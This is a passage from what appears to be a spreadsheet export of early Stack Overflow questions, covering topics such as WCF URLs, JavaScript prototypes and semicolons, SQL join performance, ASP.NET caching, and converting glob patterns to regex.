&lt;p&gt;However, I need to access the original URL that was requested from within the WCF infrastructure. Is there an equivalent to &lt;code&gt;HttpContext.Current.Request.RawUrl&lt;/code&gt; on the &lt;code&gt;OperationContext&lt;/code&gt; or &lt;code&gt;WebOperationContext&lt;/code&gt; classes anywhere? Using &lt;code&gt;WebOperationContext.Current.IncomingRequest.UriTemplateMatch.RequestUri&lt;/code&gt; returns the rewritten URL not the original one.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Do you recommend using semicolons after every statement in JavaScript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In many situations, JavaScript parsers will insert semicolons for you if you leave them out. My question is, do you leave them out?&lt;/p&gt;
&lt;p&gt;If you're unfamiliar with the rules, there's a description of semicolon insertion on the &lt;a href="http://www.mozilla.org/js/language/js20-2000-07/rationale/syntax.html" rel="nofollow"&gt;Mozilla site&lt;/a&gt;. Here's the key point:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;If the first through the n&lt;sup&gt;th&lt;/sup&gt; tokens of a JavaScript program form are grammatically valid but the first through the n+1&lt;sup&gt;st&lt;/sup&gt; tokens are not and there is a line break between the n&lt;sup&gt;th&lt;/sup&gt; tokens and the n+1&lt;sup&gt;st&lt;/sup&gt; tokens, then the parser tries to parse the program again after inserting a virtual semicolon token between the n&lt;sup&gt;th&lt;/sup&gt; and the n+1&lt;sup&gt;st&lt;/sup&gt; tokens.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;That description may be incomplete, because it doesn't explain @Dreas's example. Anybody have a link to the complete rules, or see why the example gets a semicolon? (I tried it in JScript.NET.)&lt;/p&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/42247/are-semicolons-needed-after-an-object-literal-assignment-in-javascript"&gt;This stackoverflow question&lt;/a&gt; is related, but only talks about a specific scenario.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MS-SQL 2000: Turn off logging during stored procedure</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here's my scenario:&lt;/p&gt;
&lt;p&gt;I have a simple stored procedure that removes a specific set of rows from a table (we'll say about 30k rows), and then inserts about the same amount of rows.  This generally should only take a few seconds; however, the table has a trigger on it that watches for inserts/deletes, and tries to mimic what happened to a linked table on another server.&lt;/p&gt;
&lt;p&gt;This process in turn is unbareably slow due to the trigger, and the table is also locked during this process.  So here are my two questions:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;I'm guessing a decent part of the slowdown is due to the transaction log.  Is there a way for me to specify in my stored procedure that I do not want what's in the procedure to be logged?&lt;/li&gt;
&lt;li&gt;Is there a way for me to do my 'DELETE FROM' and 'INSERT INTO' commands without me locking the table during the entire process?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
&lt;p&gt;&lt;em&gt;edit&lt;/em&gt; - Thanks for the answers; I figured it was the case (not being able to do either of the above), but wanted to make sure.  The trigger was created a long time ago, and doesn't look very effecient, so it looks like my next step will be to go in to that and find out what's needed and how it can be improved.  Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Object Oriented questions in Javascript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been using javascript for a while, but have never learned the language past the basics.  I am reading John Resig's "Pro Javascript Techniques" - I'm coming up with some questions, but I'm not finding the answers to them in the book or on google, etc.&lt;/p&gt;
&lt;p&gt;John gives this example in his book:&lt;br /&gt;
&lt;strong&gt;Function #1&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function User( name, age ){
  this.name = name;
  this.age = age;
}
// Add a new function to the object prototype
User.prototype.getName = function(){
  return this.name;
};
User.prototype.getAge = function(){
  return this.age;
};
var user = new User( "Bob", 44 );
console.log("User: " + user.getName() + ", Age: " + user.getAge());
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm still learning about the &lt;em&gt;prototype&lt;/em&gt; property, so I tried writing something similar:&lt;br /&gt;
&lt;strong&gt;Function #2&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function User (name, age ) {
  this.name = name;
  this.age = age;
  this.getName = function() {
    return this.name;
  };
  this.getAge = function() {
    return this.age;
  };
}
var user = new User( "Bob", 44 );
console.log("User: " + user.getName() + ", Age: " + user.getAge());
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It doesn't use the &lt;em&gt;prototype&lt;/em&gt; property to create the getName and getAge functions, but the output is the same as John's example.&lt;/p&gt;
&lt;p&gt;I took it one step further, and created this:&lt;br /&gt;
&lt;strong&gt;Function #3&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var User = {
  name: "",
  age: 0,
  setName: function(name) {
    this.name = name;
  },
  setAge: function(age) {
    this.age = age;
  },
  getName: function() {
    return this.name;
  },
  getAge: function() {
    return this.age;
  }
};
User.setName("Bob");
User.setAge(44);
console.log("User: " + User.getName() + ", Age: " + User.getAge());
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Again - it looks different than John's example (and I had to add setter methods), but the output is the same.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Question #1&lt;/strong&gt; - what is the difference between the 3 functions?  What is the advantage of the prototype property, and is Function #2 doing anything incorrectly, because it seems more straight forward to code #2 instead of #1 (although I'm sure #1 is doing it better seeing as John created it).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Question #2&lt;/strong&gt; - How could I modify function #3 to not use the setName and setAge methods, but still keep the {...} shorthand?  Can the {...} shorthand have constructors?&lt;/p&gt;
&lt;p&gt;Thanks in advance for helping me learn!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;
I think my 2nd question was a little confusing. I meant how could I use the {...} shorthand to create a User object, but then after I create the object, say something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var user = new User("Bob", 44);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Just like in Function #1 - or is that not possible?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT #2&lt;/strong&gt;
Wow!  Thanks everyone for the awesome answers.  That really makes it a lot more clear to me.  So if I understand correctly, the difference between #1 and #2 aren't too much.  If I only ever create one "User" object - they probably aren't different at all.  But if my program creates many User objects, #1 would most likely be more efficient and use less memory since all objects will share the same functions.&lt;/p&gt;
&lt;p&gt;I really appreciate all of the great answers - Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I send emails outside my domain with Exchange 2007 and c#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am able to send emails using the typical C# SMTP code across Exchange 2007 as long as both the from and to addresses are within my domain.&lt;/p&gt;
&lt;p&gt;As soon as I try to send emails outside the domain I get:&lt;/p&gt;
&lt;p&gt;Exception Details: System.Net.Mail.SmtpFailedRecipientException: Mailbox unavailable. The server response was: 5.7.1 Unable to relay&lt;/p&gt;
&lt;p&gt;How can I get exchange to accept my email and send it out to the internet?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can you use the asp.net membership provider in a windows application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The Asp.Net membership provider has some clear uses in a web app.  I am thinking about trying to leverage some of the features in a windows application (more specifically WPF).  Does anyone know if it is possible to use the core features in a windows app?  I am mostly just looking for it to create my database tables, and maintain users, roles, and profiles.  I obviously do not need to use the built-in web controls (e.g. Login).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there an advantage to upgrade Binutils from 2.16.1 to 2.19? Why?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In the PSPSDK (Homebrew) we are using the Binutils 2.16.1 to assemble and link the code for the PlayStation Portable, however that release is getting quite outdated (3 versions have superseded it). The community and me have been updating the GCC and newlib to the latest stable versions and everything seems to work with the old binutils.&lt;/p&gt;
&lt;p&gt;Will GCC produce better code with binutils 2.19? Why?
Will binutils 2.19 produce better elf files and libs than 2.16.1? Why?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a streaming API for JSON?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is DOM the only way to parse JSON?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I focus a foreign window?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an application which may only have one instance of itself open at a time.  To enforce this, I use this code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        System.Diagnostics.Process[] myProcesses = System.Diagnostics.Process.GetProcesses();
        System.Diagnostics.Process me = System.Diagnostics.Process.GetCurrentProcess();
        foreach (System.Diagnostics.Process p in myProcesses)
        {
            if (p.ProcessName == me.ProcessName)
                if (p.Id != me.Id)
                {
                    //if already running, abort this copy.
                    return;
                }
        }
        //launch the application.
        //...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It works fine. I would also like it to be able to focus the form of the already-running copy.  That is, before returning, I want to bring the other instance of this application into the foreground.&lt;/p&gt;
&lt;p&gt;How do I do that?&lt;/p&gt;
&lt;p&gt;Re: SetForeGroundWindow:&lt;/p&gt;
&lt;p&gt;SetForeGroundWindow works, to a point:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    [System.Runtime.InteropServices.DllImport("user32.dll")]
    public static extern bool SetForegroundWindow(IntPtr hWnd); 
    //...
                if (p.Id != me.Id)
                {
                    //if already running, focus it, and then abort this copy.
                    SetForegroundWindow(p.MainWindowHandle);
                    return;
                }
    //...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This does bring the window to the foreground if it is not minimized.  Awesome.
If the window IS minimized, however, it remains minimized.&lt;/p&gt;
&lt;p&gt;It needs to un-minimize.&lt;/p&gt;
&lt;p&gt;Solution via SwitchToThisWindow (Works!):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    [System.Runtime.InteropServices.DllImport("user32.dll")]
    public static extern void SwitchToThisWindow(IntPtr hWnd, bool fAltTab);
    [STAThread]
    static void Main()
    {
        System.Diagnostics.Process me = System.Diagnostics.Process.GetCurrentProcess();
        System.Diagnostics.Process[] myProcesses = System.Diagnostics.Process.GetProcessesByName(me.ProcessName);
        foreach (System.Diagnostics.Process p in myProcesses)
        {
            if (p.Id != me.Id)
            {
                SwitchToThisWindow(p.MainWindowHandle, true);
                return;
            }
        }
        //now go ahead and start our application ;-)
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Dynamically add multiple instances of the same user control type when button is clicked</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to add instances of the same user control when an "add" button is clicked and maintain ViewState?&lt;/p&gt;
&lt;p&gt;The user interface here is similar to the Gmail file-attachment process, where the user can click "attach another file" and another file upload box appears.&lt;/p&gt;
&lt;p&gt;My page is surrounded by an UpdatePanel. I am able to get 1 control to load, but the button's click event fires after the Placeholder_Init method.  I tried storing an integer in the ViewState that kept track of the number of user controls that should be rendered, but the Init method is also fired before the ViewState is restored.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is a fractal?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Duplicate of &lt;a href="http://stackoverflow.com/questions/425953/how-to-program-a-fractal"&gt;How to program a fractal&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;What are fractals? &lt;/p&gt;
&lt;p&gt;Is this is one of the concepts that is brought over from Mathematics to programming to simplify or solve a particular set of problems?&lt;/p&gt;
&lt;p&gt; I am closing this question and have posted a related &lt;a href="http://stackoverflow.com/questions/444628/programming-fractals"&gt; question &lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Custom dynamically created Menus producing some strange errors</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The background is I have a custom control that is a asp:Menu that is linked to an xmldatasource.  The xmldatasource is created dynamically depending on the user privies.  Here is the load event for the custom control:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  protected void Page_Load(object sender, EventArgs e)
    {
        string userId = (string)Session["userId"];
        if (userId != null)
        {
            DataSet ds = dal.RetrieveApplications(userId);
            ds.DataSetName = "Menus";
            ds.Tables[0].TableName = "Menu";
            DataRelation relation = new DataRelation
            ("ParentChild",
                ds.Tables["Menu"].Columns["Folder_Id"],
            ds.Tables["Menu"].Columns["Parent_Folder_ID"], true);
            relation.Nested = true;
            ds.Relations.Add(relation);
            xmlDataSource1.Data = ds.GetXml();
        }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This works perfectly for the first user that uses it.  But it seems that every subsequent user is actually getting the first user's menu.  I have walked it through and verified that my dataset is getting created fine and when I examine the XMLDatasource.data at the end of the load the xml is correct.  &lt;/p&gt;
&lt;p&gt;I am really stuck.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Javascript: Lazy Load Images In Horizontal Div?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a div that has a bunch of thumbnails showing horizontally (with a horizontal scrollbar). Is there a way to lazy load these thumbnails and only show them once the user horizontally scrolls to their position? All the examples I've seen check the browser window, not a div.&lt;/p&gt;
&lt;p&gt;This is for contest entries so sometimes there are hundreds of entries, which drastically affects performance.&lt;/p&gt;
&lt;p&gt;Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Spring.net Drop all adotemplate connections?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an application which is connected to a database through a spring.net AdoTemplate.  I am charged with creating a restore database method which keeps the app running but drops the network connections so as to drop the old database and bring up the new one.  My question is how do I drop all the current connections that this application has to this AdoTemplate?  I do not see any public method in spring 1.1 to drop the network connections.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can intellisense be exported or extracted from Visual Studio to a text file?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to write some documentation for a webservice that has been provided by one of our vendors for an application we're integrating.  A bunch of the interface is custom objects defined in the web service itself.  The vendor has put up significant resistance to providing any documentation for this application and so I've taken it upon myself to do their job for them [against my better judgement].&lt;/p&gt;
&lt;p&gt;The documentation they &lt;em&gt;have&lt;/em&gt; provided frankly is embarassing and I'm trying to make as short work of this as I possibly can to put some good quality docs together.  I know that as I don't have access to their source, I can't just run it through nDoc/Sandcastle to spit out an API doc, but I was wondering if (as a half way house) there was an easy way to export the intellisense to a text file without me having to write a utility to specificially iterate through each of the object types defined and reflect the members out to text?  &lt;/p&gt;
&lt;p&gt;If I could do this, it would at least make sure that I have a good quality document structure where I can just fill in the blanks.  Having to skip back and forth to Visual Studio to check the intellisense for every class member is a very laborious way of doing this.&lt;/p&gt;
&lt;p&gt;Does anyone have any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Left outer join on two columns performance issue</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using a SQL query that is similar to the following form:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT col1, col2
FROM table1
LEFT OUTER JOIN table2
ON table1.person_uid = table2.person_uid
AND table1.period = table2.period
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And it's either way too slow or something's deadlocking because it takes at least 4 minutes to return.  If I were to change it to this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT col1, col2
FROM table1
LEFT OUTER JOIN table2
ON table1.person_uid = table2.person_uid
WHERE table1.period = table2.period
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;then it works fine (albeit not returning the right number of columns).  Is there any way to speed this up?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE&lt;/strong&gt;:  It does the same thing if I switch the last two lines of the latter query:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT col1, col2
FROM table1
LEFT OUTER JOIN table2
ON table1.period = table2.period
WHERE table1.person_uid = table2.person_uid
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;UPDATE 2:&lt;/strong&gt;  These are actually views that I'm joining.  Unfortunately, they're on a database I don't have control over, so I can't (easily) make any changes to the indexing.  I am inclined to agree that this is an indexing issue though.  I'll wait a little while before accepting an answer in case there's some magical way to tune this query that I don't know about.  Otherwise, I'll accept one of the current answers and try to figure out another way to do what I want to do.  Thanks for everybody's help so far.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>jQuery scope or race condition in AJAX/getJSON</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a piece of jQuery code which invokes several &lt;code&gt;getJSON()&lt;/code&gt; calls in quick succession:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var table = $("table#output");
for (var i in items) {
    var thisItem = items[i];
    $.getJSON("myService", { "itemID": thisItem }, function(json) {
        var str = "&amp;lt;tr&amp;gt;";
        str += "&amp;lt;td&amp;gt;" + thisItem + "&amp;lt;/td&amp;gt;";
        str += "&amp;lt;td&amp;gt;" + json.someMember + "&amp;lt;/td&amp;gt;";
        str += "&amp;lt;/tr&amp;gt;";
        table.append(str);
    });
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I run this against a laggy server, the table gets populated with the expected &lt;code&gt;json.someMember&lt;/code&gt; values (they arrive out of order: I don't mind that), but the &lt;code&gt;thisItem&lt;/code&gt; column is populated with an unpredictable mixture of values from various iterations.&lt;/p&gt;
&lt;p&gt;I'm assuming this is something to do with scope and timing - the callback function is reading &lt;code&gt;thisItem&lt;/code&gt; from a wider scope? Am I right? How do I prevent this?&lt;/p&gt;
&lt;p&gt;My current workaround is for the JSON service to return a copy of its inputs - which is unsatisfying to say the least.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I cache objects in ASP.NET MVC?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to cache objects in ASP.NET MVC. I have a &lt;code&gt;BaseController&lt;/code&gt; that I want all Controllers to inherit from.  In the BaseController there is a &lt;code&gt;User&lt;/code&gt; property that will simply grab the User data from the database so that I can use it within the controller, or pass it to the views.&lt;/p&gt;
&lt;p&gt;I'd like to cache this information. I'm using this information on every single page so there is no need to go to the database each page request.&lt;/p&gt;
&lt;p&gt;I'd like something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if(_user is null)
  GrabFromDatabase
  StuffIntoCache
return CachedObject as User
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How do I implement simple caching in ASP.NET MVC?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Pacman in Java questions</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For my university assignment I have to make a networkable version of pacman. I thought I would best approach this problem with making a local copy of pacman first and then extend this functionality for network play. &lt;/p&gt;
&lt;p&gt;I would have to say that I am relatively new to java GUI development and utilizing such features within java.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://www.planetalia.com/cursos/Java-Invaders/" rel="nofollow"&gt;http://www.planetalia.com/cursos/Java-Invaders/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://javaboutique.internet.com/PacMan/source.html" rel="nofollow"&gt;http://javaboutique.internet.com/PacMan/source.html&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I have started following the above links with regards to game development within java and an example of the pacman game.&lt;/p&gt;
&lt;p&gt;I decided to represent the maze as an int array with different values meaning different things. However when the paint method inside the main game loop is run i am redrawing the whole maze with this method.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    for (int i : theGame.getMaze())
    {
        if (i == 4)
        {
            g.setColor(mazeWallColour);
            g.fillRect(curX, curY, cellSize, cellSize);
            curX += 25;
        }
        else
        {
            curX += cellSize;
        }
        index++;
        // Move to new row
        if (index == 25)
        {
            index = 0;
            curX = 10;
            curY += cellSize;
        }
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However this is providing me with less then 1fps. Although i've noticed the example linked above uses a similar way of redrawing each time the paint method is called and i believe does this on a image that is not viewable (kinda like double buffering [I've used a BufferStrategy like the first link explains]) What would be a better way to redraw the maze? &lt;/p&gt;
&lt;p&gt;Any pointers/advice with this would be useful. &lt;/p&gt;
&lt;p&gt;Thank you for your time.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://pastebin.com/m25052d5a" rel="nofollow"&gt;http://pastebin.com/m25052d5a&lt;/a&gt; - for the main game class.&lt;/p&gt;
&lt;p&gt;Edit: I have just noticed something very weird happening after trying to see what code was taking so long to execute.&lt;/p&gt;
&lt;p&gt;In the paintClear(Graphics g) method i have added &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ocean = sprites.getSprite("oceano.gif");
g.setPaint(new TexturePaint(ocean, new Rectangle(0,t,ocean.getWidth(),ocean.getHeight())));
g.fillRect(10, 10,getWidth() - 20,getHeight() - 110);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which made the whole thing run smoothly - however when i removed these lines the whole thing slowed down? What could have caused this?&lt;/p&gt;
&lt;p&gt;&lt;a href="http://pastebin.com/m15d0d70" rel="nofollow"&gt;Updated code&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where can I find a good treeview control for Flex that supports checkboxes?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;To my best knowledge the out-of-the-box Flex 3 treeview control does not support checkboxes.  Where can I find a good treeview control that supports checkboxes on any and all nodes. I would prefer open source software but commercial components are not out of the question.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why do my Button send two postbacks when downloading zip file?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a problem on a &lt;em&gt;WebForms&lt;/em&gt; application where a user selects some criteria from drop downs on the page and hits a button on the page which calls this method:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;protected void btnSearch_Click(object sender, EventArgs e)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;They then click on button to download a zip file based on the criteria which calls this method:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;protected void btnDownload_Click(object sender, EventArgs e)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In IE, they are prompted with the bar at the top of the browser that tells them:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;"To help protect your security, Internet Explorer blocked this site
  from downloading files to your computer".&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;When they click on that bar to download the file, it fires the &lt;code&gt;btnSearch_Click&lt;/code&gt; event again.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;Response.ContentType&lt;/code&gt; and &lt;code&gt;Response.AddHeader&lt;/code&gt; has been set up correctly.&lt;/p&gt;
&lt;p&gt;The problem is, that &lt;code&gt;btnSearch&lt;/code&gt; appends criteria so basically it is being appended twice and causing problems.&lt;/p&gt;
&lt;p&gt;Is there something I can do to prevent this?&lt;/p&gt;
&lt;p&gt;This is a VS2008 web application using C# 3.5 for what it's worth.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the equivalant of a 'friend' keyword in C Sharp?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the equivalant of a 'friend' keyword in C Sharp?&lt;/p&gt;
&lt;p&gt;How do I use the 'internal' keyword?&lt;/p&gt;
&lt;p&gt;I have read that 'internal' keyword is a replacement for 'friend' in C#.&lt;/p&gt;
&lt;p&gt;I am using a dll in my C# project that I have the source code for and yet I do not want to modify the existing code. I have inherited the class and I can use my inherited class any way I want. The problem is that most of the code in the parent class has protected methods. Will using a friend somehow make it possible to access or call these protected methods?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can you specify which svn branches with git svn?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I think my question is somewhat similar to &lt;a href="http://stackoverflow.com/questions/258590/how-do-i-import-svn-branches-rooted-in-different-directories-into-git-using-git-s" rel="nofollow" title="How do I import svn branches rooted in different directories into git using git-svn?"&gt;CaptainPicard's&lt;/a&gt; but dissimilar enough that I feel compelled to ask so here goes.&lt;/p&gt;
&lt;p&gt;I have an old SVN repository with around 7500 revisions and part of those 7500 revisions are some pretty large .fla files. And these .fla files exist in a number of the branches which have been created. As a result of this my .git directory after import is pretty large, something like 3.5 GB if I get the whole trunk, all the branches and all the tags. In an effort to pair this down some I did another svn clone of just the directory in trunk I wanted to work with but including all branches obviously pulls down all the history and objects for those.&lt;/p&gt;
&lt;p&gt;So my question is this, is there some way to tell git to only fetch certain branches. For example only fetch branches starting with some identifier (e.g. mybranch)?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;em&gt;Update for clarity:&lt;/em&gt;&lt;/strong&gt; I know I can point git svn init/clone at a single specific branch. What I want to be able to do is point it at a set of branches. For example, instead of matching branches/* only branches matching mybranchset*&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I write a User Defined Function?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to write this as a user defined function:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private double Score(Story s){            
               DateTime now = DateTime.Now;            
               TimeSpan elapsed = now.Subtract(s.PostedOn);            
               double daysAgo = elapsed.TotalDays;            
               return s.Votes.Count + s.Comments.Count - daysAgo;       
                              }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is this possible to do with a UDF?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When can't an object be converted to a reference?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to compile the following line of code from &lt;a href="http://code.google.com/p/enhsim"&gt;http://code.google.com/p/enhsim&lt;/a&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;enh::eout &amp;lt;&amp;lt; enh::setw(26);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;gcc gives the following error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;error: no match for 'operator&amp;lt;&amp;lt;' in 'enh::eout &amp;lt;&amp;lt; enh::setw(26)'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But the &lt;code&gt;EnhSimOutput&lt;/code&gt; class (of which &lt;code&gt;enh::eout&lt;/code&gt; is an instance) does declare:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;EnhSimOutput&amp;amp; operator&amp;lt;&amp;lt; (setw&amp;amp; p);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This problem goes away if I implement a version of the operation that accepts the object by value:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;EnhSimOutput&amp;amp; operator&amp;lt;&amp;lt; (setw p);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or if I create the &lt;code&gt;enh::setw&lt;/code&gt; object as a local, i.e.:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;enh::setw wValue(26);
enh::eout &amp;lt;&amp;lt; wValue;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My question is this: why does gcc not select the "by-reference" version of the operator to begin with?&lt;/p&gt;
&lt;p&gt;The developers who wrote this code clearly made it compile, yet default gcc refuses to do it. Why is there a difference between an object declared separately as a local variable and a local created inline?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is using a while block to do nothing a bad thing?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently working through the excercises in 'The C Programming Language'. Here's one of my solutions: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int c;
while ((c=getchar()) != EOF) {
if (c == ' ') {
    while ((c = getchar()) == ' ')
    {}  // do nothing?
    putchar(' ');
}
putchar(c);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I found some solutions &lt;a href="http://users.powernet.co.uk/eton/kandr2/krx109.html"&gt;here&lt;/a&gt; that are quite different to mine and use an extra variable to keep track of what's going on, whereas I just use a while loop to skip through all the spaces. My solution feels a bit messy, as it seems bit hackish to have a while loop with nothing between the curly braces. I was wondering if there are any good reasons not to do this? Thanks for any advice :-) &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to keep code base and database schema in synch?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So recently on a project I'm working on, we've been struggling to keep a solution's code base and the associated database schema in synch (Database = SQL Server 2008).  &lt;/p&gt;
&lt;p&gt;Database changes occur fairly regularly (adding columns, constraints, relationships, etc) and as a result it's not uncommon for people to do a 'Get Latest' from source control and 
find that they also need to rebuild the database as well (and sometimes they forget to do the latter). &lt;/p&gt;
&lt;p&gt;We're not using VSTS: Database Edition (DataDude) but the standard Visual Studio database project with a script (batch file) which tears down and recreates the database from T-SQL scripts.  The solution is a .Net &amp;amp; ASP.net solution with LINQ to SQL underlying as the ORM.&lt;/p&gt;
&lt;p&gt;Anyone have ideas on an approach to take (automated or not) which would keep everyone up to date with the latest database schema?  &lt;/p&gt;
&lt;p&gt;Continuous integration with MSBuild is an option, but only helps pick up any breaking changes committed, it doesn't really help in the scenario I highlighted above.&lt;/p&gt;
&lt;p&gt;We are using Team Foundation Server, if that helps..&lt;/p&gt;
</t>
  </si>
  <si>
    <t>jQuery form submit() is not working in IE6?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to submit a  with using jquery as below;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$("#formid").submit();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Its working perfect in all browsers except IE6.&lt;/p&gt;
&lt;p&gt;How to make it work in IE6 ??&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Create regex from glob expression</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i write program that parse text with regular expression. Regular expression should be obtained from user. I deside to use glob syntax for user input, and convert glob string to the regular expression internally. For example: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;"foo.? bar*"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;should be converted to &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;"^.*foo\.\w\bar\w+.*"
